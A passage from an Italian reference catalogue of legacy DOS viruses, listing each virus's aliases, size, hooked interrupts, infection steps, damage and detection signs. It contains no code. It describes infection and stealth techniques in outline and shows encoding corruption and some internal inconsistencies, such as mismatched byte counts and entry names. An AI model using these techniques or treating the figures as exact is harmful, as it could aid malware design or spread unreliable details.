Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.488 Byte. Procedura eseguita: 1) Il virus controlla che sia giα residente in memoria. Se "NO", si carica intercettando l'INT 21h. 2) Quindi esegue il file originale. 3) Una volta in memoria infetta ogni file non infetto che viene eseguito. Danni: Il 1░ aprile, il virus mostra il messaggio: "APRIL 1ST HA HA HA YOU HAVE A VIRUS." Dopo aver mostrato il messaggio il virus blocca il sistema. Metodo di rilevazione: April 1st aumenta la lunghezza dei file con estensione *.EXE di 1488 Byte. I file infetti contengono la stringa "SURIV.". Controllare che esista il file chiamato "BUG.DAT" nella directory C:\. Note: Si carica in memoria. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Autumn] Nome del Virus: Autumn. Pseudonimo: Virus 1701, Cascade-B. Tipo di Virus: Virus parassita, residente i memoria RAM . Lunghezza del Virus: 1.701 Byte. Vettore PC agganciato: Int 21. Procedura eseguita: 1) Il virus controlla che sia giα residente in memoria. Se "NO", si carica intercettando l'INT 21h. 2) Quindi esegue il file originale. 3) Una volta in memoria infetta ogni file non infetto che viene eseguito. Danni: Il virus Autumn causa la caduta ("fall down") dei caratteri presenti sullo schermo (modificazione della Video-RAM). Inizialmente questo non avviene frequentemente ma sucessivamente aumentano sia il "fall down", sia gli effetti sonori. I caratteri ASCII alti non cadono. I caratteri non possono attraversare le eventuali diverse zone del video. Il virus non ha effetti sui monitor monocromatici. Alcune volte il virus causa il blocco del sistema Metodo di rilevazione: I file infetti aumentano di lunghezza di 1.701Byte. Note: Si carica in memoria. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Bogus-B] Nome del Virus: BOGUS-B. Tipo di Virus: Virus da file (file con estensione *.EXE e *.COM) e infetta la tabella delle partizioni. Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: INT 21h, INT 24h, INT 13h. Processo di infezione: 1) Quando si esegue un file infettato dal virus Bogus-B questo controlla che il settore #1 sia stato infettato. Se "NO", il virus lo infetta. 2) Controlla che sia giα in memoria. Se "NO", si carica intercettando l'INT 21h e l'INT 13h, quindi esegue il file originale. 3) Una volta in memoria BOGUS-B pu≥ infettare ogni programma eseguibile. Danni: Quando il numero dei file infetti sorpassa 2710h, BOGUS-B distrugge tutti i dati sull'hard disk. Metodo di rilevazione: Controllare che il file header sia l'INT 13h (AX=90 o 91). Se "SI", controlla che sia agganciato l'INT 21h . a) Quando si avvia il sistema, bisogna trasformare 21_flag=3. b) Controllare che l'INT 21h sia chiamato da altri programmi; se "SI", 21_flag Φ diminuita di 1. c) Quando 21_flag=0, BOGUS intercetta l'INT 21h per infettare altri file. 2) Controllare ogni tentativo di leggere il settore #1; In caso positivo, mostrare i dati originali del settore #1. 3) Controllare che sia AX=90 o 91; se "SI", eseguire il giusto interrupt. Notes: BOGUS intercetta l'INT 24h quando infetta i file. Omette gli errori di I/O (come per esempio protetto da scrittura). [Bulgarian Virus] Nome del Virus: Bulgarian Virus. Pseudonimo: Virus 1800, Sofia virus, Dark Avenger. Tipo di Virus: Virus parassita e del Settore di Boot. Lunghezza del Virus: Circa 1.800 Byte. Vettore PC agganciato: Int 21. Processo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica intercettando l'INT 21h. 2) Il virus esegue poi il file originale. 3) Una volta che il virus Φ in memoria viene infettato ogni file non infetto eseguito. Danni: Il virus legge il settore di boot del disco (offset 10, OEM Versione decimale) e si segna il numero dei programmi che vengono eseguiti dal disco MOD 16. Se Φ zero (ogni volta che vengono eseguiti 16 programmi!!), sovrascrive un cluster, scelto casualmente, con il proprio codice virale. Il numero del cluster viene quindi memorizzato nel settore di boot all'offset 8 (OEM versione principale). Il settore di boot modificato viene riscritto sul disco. Metodo di rilevazione: I file infetti aumentano di 1.800 Byte. Notes: 1) Si carica in memoria. 2) Non intercetta l'INT 24h quando infetta i file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Cannabis-B] Nome del Virus: Cannabis-B. Tipo di Virus: Virus da file. Lunghezza del Virus: Nessuna. Vettore PC agganciato: Nessuna. Procedura eseguita: Quando viene eseguito un file infetto, il virus da boot "Cannabis" viene scritto sul settore di boot del drive A. Danni: Vedere quanto detto sopra in "Procedura eseguita". Metodo di rilevazione: Nessuno. Notes: Cannabis non intercetta l'INT 24h quando infetta il file. Omette errori di I/O (come per esempio protetto da scrittura). [Christmas] Nome del Virus: Christmas. Pseudonimos: Virus 600, Xmas In Japan, Japanese Christmas. Tipo di Virus: Virus da file (file con estensione *.COM) Lunghezza del Virus: 600 Byte Danni: Quando viene eseguito un file infetto il 25 dicembre, appare il seguente messaggio: "A Merry christmas to you" oppure "Jingo Bell, jingo bell, jingo all the way." Metodo di rilevazione: Il file COMMAND.COM aumenta di 600 Byte ed i file con estensione *.COM infetti aumentano di 600 Byte. [Comp-3351] Nome del Virus: Comp-3351. Tipo di Virus: Virus parassita. Lunghezza del Virus: 3.351 Byte. Procedura eseguita: Comp-3351 cerca un file con estensione *.EXE nella directory corrente. Quindi crea un file con estensione *.COM (file nascosto) usando lo stesso nome del file con estensione *.EXE. Il file con estensione *.COM contenente il codice del virus Φ lungo 3.351 Byte. Danni: Nessuno. Metodo di rilevazione: La lunghezza dei file Φ di 3.351 Byte. Note: 1) Non residente in memoria. 2) Il file del virus Φ compresso e non Φ possibile individuarlo prima che sia decompresso (similmente a PKLITE). [Como-B] Nome del Virus: Como-B. Tipo di Virus: Virus da file (file con estensione *.EXE). Lunghezza del Virus: 2.020 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file con estensione *.EXE nella directory corrente ed una volta trovato, controlla che sia giα stato infettato da COMO-B. Se il file Φ giα stato infettato, il virus continua a cercare ogni file con estensione *.EXE non infetto. 2) COMO-B infetta un file alla volta. 3) Dopo che tre file sono stati infettati, appare il seguente messaggio: "This is the ...COMO-LAKE .. virus(rel . 1 1).........I'm a non-destructive virus developed to study the worldwide diffusion rate. I was released in September 1990 by a software group resident near Como lake (north Italy) .....Don't worry about your data on disk. My activity is limited only .. to auto-transferring into other program files. Perhaps you've got .. mogni files infected. Press a key to execute the prompt. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 2.020 Byte. Note: 1) Non residente in memoria. 2) COMO non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [D-Tiny] Nome del Virus: D-TINY. Tipo di Virus: In memoria, Virus da file (file con estensione *.COM). Lunghezza del Virus: 126 Byte. Vettore PC agganciato: INT 21h. Metodo di infezione: 1) In caso non fosse caricato in memoria, D-Tiny si carica intercettando l'INT 21h. 2) Quindi esegue il file originale. 3) Una volta in memoria infetta ogni file non infetto eseguito. Non infetta i file con estensione *.EXE. Danni: Nessuno. Metodo di rilevazione: I file infetti con estensione *.COM aumentano di 126 Byte. Note: D-TINY non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Dark_Avenger] Nome del Virus: Dark_Avenger. Pseudonimo: Eddie. Tipo di Virus: Virus da file (file con estensione *.EXE e *.COM). Lunghezza del Virus: 1.800 Byte. Vettore PC agganciato: INT 21h. Metodo di infezione: Quando viene eseguito un file infetto, il virus si carica in memoria. Mentre viene caricato, infetta ogni file eseguito.I file infetti aumentano di 1.800 Byte. Danni: Il virus legge il settore di boot del disco e segna il numero di programmi eseguiti dal disco. Ogni volta che vengono eseguiti 16 programmi, il virus sovrascrive un cluster del disco, scelto casualmente, con il proprio codice. I file infetti contengono questa stringa: "Eddie lives...somewhere in time! Diana P." "This program was written in the city of Sofia (C) 1988-89 Dark Avenger." [Data Crime IIB] Nome del Virus: Datacrime II b. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.460 Byte. Danni: Il virus formatta a basso livello il cilindro 0 dell'hard disk dopo il 12 ottobre. Metodo di rilevazione: Tra il 12 e il 31 ottobre, esclusi i luned∞, il virus mostra il seguente messaggio: "DATACRIME-2 VIRUS." Il virus quindi formatta a basso livello il cilindro 0 dell'hard disk. Blocca il sistema. [Deiced] Nome del Virus: Deiced. Tipo di Virus: Virus da file, in memoria alta (solamente i file con estensione *.COM). Lunghezza del Virus: 2.333 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente nella memoria alta. Se "NO", si carica in memoria alta agganciando l'INT 21h. 2) Controlla che il COMMAND.COM sia stato infettato. Se "NO", lo infetta. 3) Deiced controlla la data di sistema, in caso sia il 15 gennaio, aprile o agosto, il virus danneggia tutti i file del disco di sistema. Metodo di infezione: Il virus infetta un file con estensione *.COM agganciandosi a AX=4B00h (se il file non Φ infetto). Quando viene eseguito il comnando "DIR", il virus cerca tutti i file non infetti nella directory e li infetta. Deiced intercetta l'INT 24h per nascondersi mentre infetta i file. Danni: Se la data del sistema Φ il 15 di gennaio, aprile o agosto, il virus danneggia tutti i file del disco di sistema. Metodo di rilevazione: I file infetti aumentano di 2.333 Byte. [Dropper-4] Nome del Virus: DROPPER-4. Tipo di Virus: Virus da file (file con estensione *.EXE e *.COM). Lunghezza del Virus: 1.125 Byte. Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Il virus cerca i file non infetti con estensione *.EXE o *.COM nella directory corrente. 2) Infetta due file alla volta. 3) Esegue il file originale. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.125 Byte. Notes: 1) Non residente in memoria. 2) Dropper-4 intercetta l'INT 24h quando infetta i file. Omette gli errori di I/O (come per esempio protetto da scrittura). [Ell] Nome del Virus: ELL. Pseudonimo: Nessuno. Tipo di Virus: Virus da file (I file con estensione *.EXE e *.COM). Lunghezza del Virus: 1.237-1246 Byte (I file con estensione *.EXE), 1.237 Byte (I file con estensione *.COM). Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Il virus in memoria infetta ogni file non infetto eseguito. Danni: Nessuno. Metodo di rilevazione: Aumenta la misura dei file infetti di 1.237/1.246 Byte. Note: Si carica in memoria. Appare un messaggio d'errore in caso vi sia un errore di I/O (come per esempio protetto da scrittura). [Elvis] Nome del Virus: Elvis. Tipo di Virus: Virus da file. (I file con estensione *.COM). Lunghezza del Virus: 1.250 Byte. Vettore PC agganciato: INT 8h. Procedura eseguita: 1) Il virus cerca i file con estensione *.COM non infetti nella directory corrente e li infetta tre alla volta. 2) Intercetta l'INT 8h ed esegue il file originale. Danni: Circa 8 minuti dopo l'esecuzione del virus appare sullo schermo uno dei seguenti messaggi: 1) "Elvis lives!" 2) "ELVIS is watching!" 3) "Don maybe he lives here!.....," eccetera. Metodo di rilevazione: I file infetti aumentano di 1.250 Byte. Notes: 1) Non rimane in memoria. 2) Elvis non intercetta l'INT 24h quando infetta il file. Omette gli errori di I/O (come per esempio protetto da scrittura). [F3] Nome del Virus: F3. Tipo di Virus: In memoria, Virus da file. (I file con estensione *.EXE e *.COM). Lunghezza del Virus: 50.406 Byte. Vettore PC agganciato: INT 21h, AX=4B00h(Programma eseguibile), INT 24h. Metodo di infezione: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta intercettando l'INT 21h. 2) Controlla la data di sistema. Se Φ il giorno 1 aprile, appaiono sullo schermo due linee del codice. 3) Esegue il file originale. 4) Una volta in memoria, infetta ogni file non infetto eseguito. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 50.406 Byte. Note: Il virus F3 intercetta l'INT 24h quando infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). [Flip-B] Nome del Virus: Flip-B. Tipo di Virus: Infetta la tabella delle partizioni ed i file Lunghezza del Virus: 2.153 Byte. Vettore PC agganciato: INT 21h, INT 24h, INT 1Ch. Procedura eseguita: 1) Quando viene eseguito un file infetto, il virus controlla che il settore #1 dell'hard drive sia infetto. Se "NO", il virus procede alla sua infezione. 2) Controlla che sia residente in memoria. Se "NO", si carica in memoria intercettando l'INT 21h e INT 1Ch. 3) Infetta i file quando vengono eseguiti. Danni: A volte non si riesce ad avviare il computer dall'hard disk. Metodo di rilevazione: I file infetti aumentano di 2.153 Byte. INT 1Ch: Controlla che l'INT 21h costantemente intercettato da un altro programma. Note: Flip-B intercetta l'INT 24h quando infetta i file, omette gli errori I/O (come per esempio protetto da scrittura). [Gp 1] Nome del Virus: Gp1. Tipo di Virus: Network Specific Virus. Lunghezza del Virus: 1.557 Byte (file con estensione *.EXE), 1.845 Byte (file con estensione *.COM). Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", si carica in memoria alta intercettando l'INT 21h. 2) Esegue il file originale. 3) Una volta in memoria infetta ogni file non infetto eseguito. Sintomi: Se il virus Φ attivo in memoria e se il primo carattere sulla linea di comando Φ "i", il virus esce dalla memoria (questo avviene solo se il virus Φ l'ultimo TSR per cambiare l'INT21h) e mostra il messaggio "GP1 Removed from memoria." Danni: Nessuno. Gp1 Φ l'unico LAN virus conosciuto. Questa Φ una variante del virus Jerusalem ed Φ stato creato con uno scopo preciso: penetrare nei dispositivi di sicurezza Novell e diffondersi nel network. Il virus non contiene nessuna manipolazione (escludendo il monitoraggio Novell LOGIN e il tentativo di forzare i dispositivi di sicurezza Novell). [Hiccup] Nome del Virus: Hiccup. Pseudonimoes: Comp-3351. Tipo di Virus: Virus parassita (file con estensione *.EXE). Lunghezza del Virus: 3.351 Byte. Procedura eseguita: 1) Hiccup cerca un file con estensione *.EXE nella directory corrente. 2) Crea un file con estensione *.COM (file nascosto) consistente nel codice del virus. Una volta eseguito, esegue i file con estensione *.COM, quindi ritorna alla funzione originale. Danni: Nessuno. Metodo di rilevazione: La lunghezza del file Φ di 3,351 Byte. Note: 1) Non residente in memoria. 2) Il file del virus Φ compresso e non pu≥ essere individuato senza che venga decompresso (similmente a PKLITE). [Icelandic] Nome del Virus: Icelandic. Pseudonimo: Saratoga. Tipo di Virus: Virus da file. Lunghezza del Virus: 642 Byte (EXE). Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Una volta in memoria, infetta ogni file non infetto eseguito. Non infetta i file con estensione *.COM. Danni: I file infetti con estensione *.EXE aumentano di 642 Byte. Note: 1) Il virus si carica residente in memoria. 2) Non intercetta l'INT 24h quando infetta i file. 3) Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Inok-2371] Nome del Virus: Inok-2371. Tipo di Virus: Virus parassita. Lunghezza del Virus: I file infetti con estensione *.COM aumentano di 2.372 Byte. (Non infetta i file con estensione *.EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: Decide di usare indistintamente uno dei seguenti metodi: 1) Cerca i file non infetti con estensione *.COM nella directory corrente. In caso ve ne sia uno, lo infetta (infetta un solo file alla volta), e/o il programma principale. 2) Crea un file chiamato ICONKIN.COM nella directory corrente e lo esegue. (Non infetta tutti i file. Mostra una piccola finestra ripetutamente finchΦ non Φ premuto un tasto. La piccola finestra ricompare dopo un certo periodo di tempo. Mentre la finestra compare sullo schermo, le applicazioni aperte sono bloccate.) Metodo di infezione: 1) Il virus infetta i file da AH=4B dell'INT 21h. Quando viene eseguito un file pulito, il virus lo infetta. 3) Lycee intercetta l'INT 24h prima di infettare i file per ignorare gli errori di I/O. Danni: Fare riferimento a Procedura eseguita 2). Metodo di rilevazione: 1) Ricercare la piccola finestra descritta nella Procedura eseguita 2). 2) I file infetti aumentano di 2.372 Byte. Note: 1) Non residente in memoria. 2) Quando infetta i file, il virus non intercetta l'INT 24h. Appare un messaggio d'errore in caso ci siano errori di I/O (come per esempio protetto da scrittura). [J-Infect] Nome del Virus: J-Infect. Tipo di Virus: Residente in memoria, Virus da file (infetta i file con estensione *.EXE e *.COM). Lunghezza del Virus: 12.080 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Simile al virus "JERUSALEM" che infetta gli stessi tipi di file. Metodo di rilevazione: I file infetti aumentano di 10.280 Byte. [Joanna] Nome del Virus: JOANNA. Pseudonimoes: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 986 Byte. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Una volta residente in memoria infetta ogni file non infetto eseguito. Metodo di rilevazione: 1) Il virus mostra il messaggio: "I love you Joanna, Apache...." 2) I file infetti aumentano di 986 Byte. Note: Si carica residente in memoria. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [July 4] Nome del Virus: July 4, Stupid 1. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 743 Byte. Procedura eseguita: 1) Se la parola all'indirizzo 0000:01FEh Φ FFFFh, il virus non infetta ogni file. Altrimenti infetta tutti i file puliti con estensione *.COM nella directory corrente. In caso il numero di infezioni sia inferiore a 2, inizia ad infettare i file con estensione *.COM nella directory superiore finchΦ pi∙ di due file siano stati infettati o finchΦ non abbia raggiunto la directory principale. 2) Se Φ il giorno 4 Luglio e l'ora 0:00, 1:00, 2:00, 3:00, 4:00, o 5:00, il virus distrugge i dati sul dischetto. Metodo di rilevazione: 1) Vengono cambiate data ed ora dei fie infetti. 2) Il Byte allo 0003h del file infetto con estensione *.COM Φ 1Ah. 3) I file infetti con estensione *.COM mostrano uno dei seguenti messaggi: "Abort, Retry, Ignore, Fail?" , "Fail on INT 24" (2) - "Impotence error reading users disk" (0) - "Program too big to fit in memoria" (1) - "Cannot load .COMMAND, system halted" (3) - "Joker!" and "*.com." [K] Nome del Virus: N1. Tipo di Virus: COM Virus da file. Lunghezza del Virus: 10.230-10.240 Byte. Procedura eseguita: 1) Cerca un file non infetto con estensione *.COM nella directory corrente e lo infetta. (Infetta un solo file alla volta). 2) Quindi mostra il seguente messaggio : "This File Has Been Infected By NUMBER One!" Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore mentre si scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: 1) Quando vengono esguiti i file infetti appare il messaggio sopra riportato. [Kill COM] Nome del Virus: Killcom. Tipo di Virus: Virus da file. Lunghezza del Virus: 31.648 Byte. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca il COMMAND.COM nella directory corrente di C:\. 2) Se lo trova, altera questo file. Se "NO", crea un file COMMAND.COM di 213 Byte. Danni: Altera i file COMMAND con estensione *.COM nella directory corrente di C:\. Metodo di rilevazione: Nessuno. Note: 1) Non residente in memoria. 2) Non intercetta l'INT 24h quando infetta i file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [LB-Demonic] Nome del Virus: lb-Demonic. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Infetta tutti i file non infetti con estensione *.COM nella directory corrente. 2) Quando il file viene eseguito appare il messaggio: "EXEC FAILURE". 3) Controlla la data di sistema. Se Φ marted∞, il virus rinomina il COMMAND.COM di C:\ con COMMAND.C0M (la "O" dn .COM cambiata con "0"). 4) Mostra questo messaggio: "Error reading drive C:\ BillMeTuesday". Danni: 1) Rinomina il COMMAND.COM con COMMAND.C0M, cos∞ il sistema non Φ avviabile da un disco. 4) Sovrascrive il file originale ed i file infetti quindi non aumenta la loro lunghezza. 5) Note: 1) Non residente in memoria. 2) Non intercetta l'INT 24h quando infetta i file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Mixer 1A] Nome del Virus: Mixer 1A. Pseudonimo: Virus 1618. Tipo di Virus: Virus da file. Lunghezza del Virus: Approssimativamente 1.618 Byte. Vettore PC agganciato: Int 21. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Una volta residente in memoria, infetta ogni file non infetto eseguito. Danni: Il mescolamento di caratteri inviati alla porta parallela o seriale usando le funzioni del bios, Φ la principale procedura di danneggiamento del virus. Tutti i Byte inviati alla porta vengono tradotti usando la tabella del virus. Cinquanta minuti dopo che il virus si Φ installato, viene attivata la procedura della tastiera. Da questo momento, CapsLock Φ regolato su OFF e Numlock su ON. Il virus controlla che "Ctrl", "Alt" e "Del" siano premuti contemporaneamente. In questo caso il virus elimina il comando "Alt" ed attiva una procedura per la manipolazione dello schermo. Tuttavia il virus potrebbe richiamare la procedura in maniera errata. Nella modalitα text, il virus cambia tutti gli attributi della pagina 0 del video. Aggiunge 1 a tutti gli attributi e quando arriva a 256 il virus si reimposta da solo. Dopo sessanta minuti che il virus Φ in memoria, mostra una palla simile a quella vista nel virus Ping-Pong. La palla Φ segnata "o" ed i suoi movimenti sono controllati dal BIOS (interrupt 10h). Note: Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Multi-2B] Nome del Virus: Multi-2-B. Tipo di Virus: Virus da file (infetta i file con estensione *.COM e *.EXE) infetta la tabella delle partizioni. Lunghezza del Virus: 927 Byte (i file con estensione *.COM), circa 1.000 Byte (i file con estensione *.EXE). Vettore PC agganciato: INT 21h, INT 24h, INT 1Ch, INT 13h. Procedura eseguita: 1) Quando si esegue un file pulito, il virus infetta il Settore #1 (se non Φ ancora stato infettato) dell'hard disk. 2) Controlla che sia residente in memoria. Se "NO", infetta il Settore #1 quindi esce se viene eseguito il programma originale. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 927-1.000 Byte. Note: 1) Multi-2 intercetta l'INT 24h quando infetta i file. 2) Omette gli errori di I/O (come per esempio protetto da scrittura). [Necro-B] Nome del Virus: Necro-B. Tipo di Virus: Virus da file (infetta i file con estensione *.EXE ed i file con estensione *.COM). Lunghezza del Virus: 696 Byte (COM ed EXE). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Cerca i file non infetti con estensione *.COM ed *.EXE nella directory corrente ed infetta tre file alla volta. Danni: Nessuno. Metodo di rilevazione: 1) I file infetti aumentano di 696 Byte. Note: 1) Non residente in memoria. 2) Non intercetta l'INT 24h quando infetta i file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). 3) I file infetti non possono essere eseguiti od infettare altri file. [No Wednesday] Nome del Virus: NO-WEDNESDAY. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 520 Byte (COM). Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Cerca i file puliti con estensione *.COM nella directory corrente e li infetta, uno alla volta. 2) Mostra il messaggio: "file not found". Danni: I file infetti non possono eseguire il file originale. Metodo di rilevazione: 1) I file infetti aumentano di 520 Byte. 2) Il messaggio "file not found" appare sullo schermo. Note: 1) Non residente in memoria. 2) Intercetta l'INT 24h quando infetta i file. Omette gli errori di I/O (come per esempio protetto da scrittura). [Prudent] Nome del Virus: Prudent. Pseudonimo: 1210. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.210 Byte (file con estensione *.EXE). Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Una volta residente in memoria, infetta ogni file non infetto eseguito. Non infetta i file con estensione *.COM. Danni: Sovrascrive il file originale. Metodo di rilevazione: Dal primo al 4 maggio, il virus controlla frequentemente il disco, questo determina un anomalo lavoro del disco. Note: 1) Residente in memoria. 2) Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Sandwich] Nome del Virus: SANDWICH. Tipo di Virus: In memoria alta, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 1.172 Byte (COM). Vettore PC agganciato: INT 21h, AX=4B00h (Programma eseguibile). Metodo di infezione: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Mentre residente in memoria, infetta ogni file non infetto eseguito. Non infetta i file con estensione *.EXE. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.172 Byte. Note: Sandwich non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Scythe-2d] Nome del Virus: Scythe-2d. Tipo di Virus: Virus da boot. Vettore PC agganciato: INT 13h. Procedura eseguita: 1) Modifica la capienza della memoria, la diminuisce di 1K. 2) Si installa residente in memoria (nell'ultimo 1K della memoria). 3) Intercetta l'INT 13h. 4) Ritorna il controllo al DOS ed il sistema si avvia normalmente. Danni: Nessuno. Note: 1) Quando si avvia il sistema con un dischetto, il virus controlla che l'hard disk sia infetto. Se "NO", il virus lo infetta. 2) INT 13h: controlla ogni richiesta del contenuto del settore di boot o della tabella delle partizioni. In caso di richiesta, il virus ritorna ai file originali non infetti. [Sunday] Nome del Virus: Sunday. Pseudonimo: Nessuno. Tipo di Virus: Virus del settore di boot (Residente in memoria). Lunghezza del Virus: 1.636 Byte. Danni: Il sistema infetto diventa inutilizzabile la domenica. Metodo di rilevazione: Ogni domenica, il virus mostra il seguente messaggio: "Today is Sunday! Why do you work so hard? All work and no play makes you a dull boy! Come on! Let's go out and have some fun!" [The Silence of the Lamb!] Nome del Virus: The Silence Of The Lamb!. Tipo di Virus: Residente in memoria, Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 555 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia ancora nell'ultimo blocco di memoria. Se "NO", rimane in memoria alta e ritorna alla procedura originale. Metodo di infezione: 1) Codifica i primi 200h Byte del file originale. 2) Aggiunge il codice decifrato alla fine del file. 3) Cifra il codice del virus e lo scrive sui primi 200h Byte del file. Danni: Nessuno. Note: 1) Intercetta l'INT 21H (AH=4Bh) per infettare i file. 2) Aggancia l'INT 24h per evitare di lasciare tracce quando scrive, poi controlla che il programma da eseguire sia un file non infetto con estensione *.COM (la lunghezza deve essere compresa tra 0400h e FA00h Byte) . Se "SI", lo infetta. Infine, il virus ripristina l'INT 24h. 3) Non vengono modificate data ed ora dei file infetti. Metodo di rilevazione: 1) Richiama l'INT21h (AH=2Dh,CH=FFh,DH=FFh) per ritornare al valore AH. Se AH=00h, la memoria Φ infetta. Se AH=FFh, la memoria non Φ infetta. 2) Se la parola all'indirizzo 0002 del file con estensione *.COM Φ 5944h, la memoria Φ infetta. Dopo che il codice del virus Φ stato decifrato, in 01E6h-01EFh c'Φ il seguente testo: " The Silence Of The Lamb!$" 3) La memoria totale diminuisce di 1.568 Byte. [USSR] Nome del Virus: USSR. Pseudonimo: 570, 8-17-88, 2:08a. Tipo di Virus: Virus parassita. Lunghezza del Virus: 570 Byte. Metodo di infezione: 1) Infetta i file con estensione *.EXE. Fa aumentare la lunghezza dei file da 570 a 585 (570+15) Byte. I successivi multipli di 16 della grandezza del file originale sono incrementati di 570 Byte. 2) Ora e data dei file Φ impostata su 8-17-88 alle 2:08. Danni: Scrive su un settore di boot del drive C, quindi blocca il sistema. [Vacsina-V16h] Nome del Virus: Vacsina V16h. Pseudonimo: Virus 1339. Tipo di Virus: Virus parassita, Residente in RAM . Lunghezza del Virus: Circa 1.339 Byte. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Mentre Φ residente in memoria, infetta ogni file non infetto eseguito. Danni: Il virus modifica il virus Ping-Pong in memoria. Cambia due Byte, salta, aggiunge una subroutine. Dopo 255 riavvii, il disco infetto viene disattivato in memoria, riportando il vettore dell'interrupt a 13h con il valore di 0:413h. Il virus suona la canzone"Yankee Doodle". Note: Si carica in memoria. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [VCL-2-B] Nome del Virus: Vcl-2-B. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 663 Byte (COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Una volta localizzato un file, controlla che sia giα stato infettato da VCL-2. Se "SI", continua a cercare file non infetti con estensione *.COM. 3) Infetta solo due file alla volta. Danni: Nessuno. Metodo di rilevazione: 1) I file infetti aumentano di 663 Byte. Note: 1) Non residente in memoria. 2) Non intercetta l'INT 24h quando infetta i file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Violator] Nome del Virus: Violator. Pseudonimo: Violator Strain B, Violator BT. Tipo di Virus: Virus da file. Lunghezza del Virus: 1.055 Byte (file con estensione *.COM). Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Mentre residente in memoria, infetta ogni file non infetto eseguito. Non infetta i file con estensione *.EXE. Danni: Se la data del sistema Φ Φ successiva al giorno 15 agosto 1990, il virus formatta il primo cilindro del drive in uso. Metodo di rilevazione: I file infetti con estensione *.COM aumentano di 1.055 Byte. Note: 1) Residente in memoria. 2) Appare un messaggio d'errore se c'Φ un errore di I/O (come protetto da scrittura). [Virus 9] Nome del Virus: Virus9. Tipo di Virus: Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 256 Byte (file con estensione *.COM). Vettore PC agganciato: Nessuno. Procedura eseguita: 1) Ricerca un file con estensione *.COM nella cartella in uso. 2) Infetta tutti i file non infetti finchΦ tutti i file della cartella in uso e quelli della cartella "mother" siano stati infettati. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 256 Byte. Note: 1) Non residente in memoria. 2) Non intercetta l'INT 24h quando infetta i file. Appare un messaggio d'errore se c'Φ un errore di I/O (come per esempio protetto da scrittura). 3) Il virus non reinfetta. [Winword.Nuclear] Nome del Virus: Winword.Nuclear. Tipo di 